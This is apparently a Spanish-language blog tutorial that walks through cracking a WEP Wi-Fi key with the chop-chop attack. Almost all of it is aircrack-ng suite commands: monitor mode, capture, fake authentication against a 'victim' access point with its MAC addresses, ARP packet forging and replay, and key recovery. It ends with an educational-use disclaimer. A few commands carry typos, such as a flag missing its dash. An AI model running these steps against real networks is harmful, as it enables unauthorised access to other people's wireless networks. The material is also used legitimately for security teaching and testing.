Ataque Chop-Chop a WEP

En este post les enseñare como romper un cifrado WEP

primero que todo miraremos como se llama nuestra interfaz de red inalambrica con el siguinte comando

#iwconfig

Como podemos ver en la imagen anterior mi dispositvo se llama wlan0

lo siguiente que haremos es poner muestro dispostivo en modo promiscuo (modo monitor)

#airmon-ng stop wlan0

#airmon-ng start wlan0

Ahora localizamos el AP

#airodump-ng wlan0


Como podemos ver en la imagen anterior tenemos un AP con ESSID JONATHAN y usa el protocolo WEP

#airodump-ng c 1 -w prueba -i wlan0

El siguiente paso es asociarnos contra el AP victima con el siguinte comando

#aireplay-ng -1 0 -e JONATHAN -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 wlan0

Ahora vamos a usar el ataque Chop-Chop

#aireplay-ng -4 -h 00:E0:4C:04:03:47 -b 00:0A:56:9A:18:FB wlan0

Despues presionamos la tecla «y»

Ahora creamos una petición de paquete arp usando el archivo .xor:

#packetforge-ng -0 -a 00:0A:56:9A:18:FB -h 00:E0:4C:04:03:47 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0914-174512.xor -w arp-request

Ahora enviaremos el paquete ARP creado anteriormente

#aireplay-ng -2 -h 00:E0:4C:04:03:47 -r arp-request wlan0

En la siguiente imagen podemos ver en la columna #Data Ya tenenemos los paquetes necesarios para poder lograr descifrar la contraseña

Ahora vamos a descifrar la contraseña con el siguiente comando

aircrack-ng -n 64 -z -f 1 -e JONATHAN -b 00:0A:56:9A:18:FB prueba-02*.ivs

Como podemos ver en la imagen anterrior tenemos la contraseña en tipo ASCII y la contraseña es WALDO

Este tipo de ataque es muy usado ya que el intruso no tiene que esperar a que un cliente esta autenticado en el AP.

Toda la información aquí expuesta es para uso educativo y/o científico. Todo lo que hagas con estos programas es responsabilidad tuya.